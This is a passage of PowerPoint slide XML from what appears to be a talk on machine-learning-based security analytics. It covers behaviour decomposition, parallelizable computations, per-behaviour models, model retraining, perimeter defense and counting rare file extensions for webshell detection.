              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Application Counts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Rare file extension counts for Webshell detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17226304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3: Decompose the problem into two types of computation</a:t>
            </a:r>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2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" b="81995"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="630314"/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889065" y="1763248"/>
            <a:ext cx="3498272" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Arbitrary User Behavior = Sequential Component + “Un-Ordered” Component</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889065" y="2008086"/>
            <a:ext cx="4071249" cy="2683252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mapping Behaviors to Computational Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Easy to Parallelize</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Count()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Average()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Time series()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Local state computations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Per user/IP/account/…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Hard to Parallelize (NC Complete Complexity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Rank()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Median</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Anything that keeps track of global state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-742950">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Machine Learning Computations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>Matrix Inversion or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>Stochastic Gradient Descent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Screen Shot 2015-02-16 at 2.05.23 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1964" t="16231" r="3343"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4558453"/>
            <a:ext cx="4995806" cy="501000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20221716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4: Build an ML Model for each important sub-behavior</a:t>
            </a:r>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2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" b="24141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="2655596"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5623543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Perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ssets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>irst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>efense</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Shape 7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dirty="0"/>
              <a:t>Logically perimeter assets are the first line of defense. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Constantly under attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Vulnerable to unknown/0 days (I.E Heartbleed, Shellshock)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Defenders must constantly monitor, update, patch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Rely heavily on static signature technology, this technology is reactive, passive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>3rd party risks (Forgotten/Shared/Collocated, Unpatched, Unsecured APIs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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4: Build an ML Model for each important sub-behavior</a:t>
            </a:r>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2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" b="24141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="2655596"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5111401" y="3831960"/>
            <a:ext cx="3099928" cy="1210020"/>
            <a:chOff x="1599824" y="2286002"/>
            <a:chExt cx="8954856" cy="4032582"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7491329" y="4321032"/>
              <a:ext cx="0" cy="10868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stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5781745" y="2286002"/>
              <a:ext cx="737226" cy="596347"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1599824" y="2805277"/>
              <a:ext cx="3345773" cy="2509367"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="Screen Shot 2016-01-13 at 11.19.40 A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263" y="5596987"/>
              <a:ext cx="8071417" cy="721597"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13" descr="Screen Shot 2016-01-13 at 11.25.44 AM.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3180" y="3031341"/>
              <a:ext cx="5214230" cy="176984"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14" descr="Screen Shot 2016-01-14 at 8.48.42 PM.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId8">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect t="14188" b="14114"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5213180" y="3777243"/>
              <a:ext cx="5341500" cy="353796"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4458811" y="3580748"/>
            <a:ext cx="3244799" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>Each Model can be batch, real-time or hybrid mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4144333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5:  Operationalize the Model Life Cycle</a:t>
            </a:r>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2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="3500714"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10921991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5:  Operationalize the Model Life Cycle</a:t>
            </a:r>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2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="3500714"/>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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266499" y="4671282"/>
            <a:ext cx="3733714" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>How do we programmatically learn new patterns over time?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20488201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5:  Operationalize the Model Life Cycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" t="75524"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="3655315"/>
            <a:ext cx="3239951" cy="856850"/>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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266499" y="4671282"/>
            <a:ext cx="3733714" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>How do we programmatically learn new patterns over time?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>When is an ML model Ready</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>When should we re-train?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>How should new data weighted over old data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>How do we know when a model is ready?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17670112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Step 5:  Operationalize the Model Life Cycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" t="75524"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="3655315"/>
            <a:ext cx="3239951" cy="856850"/>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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266499" y="4671282"/>
            <a:ext cx="3733714" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>How do we programmatically learn new patterns over time?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
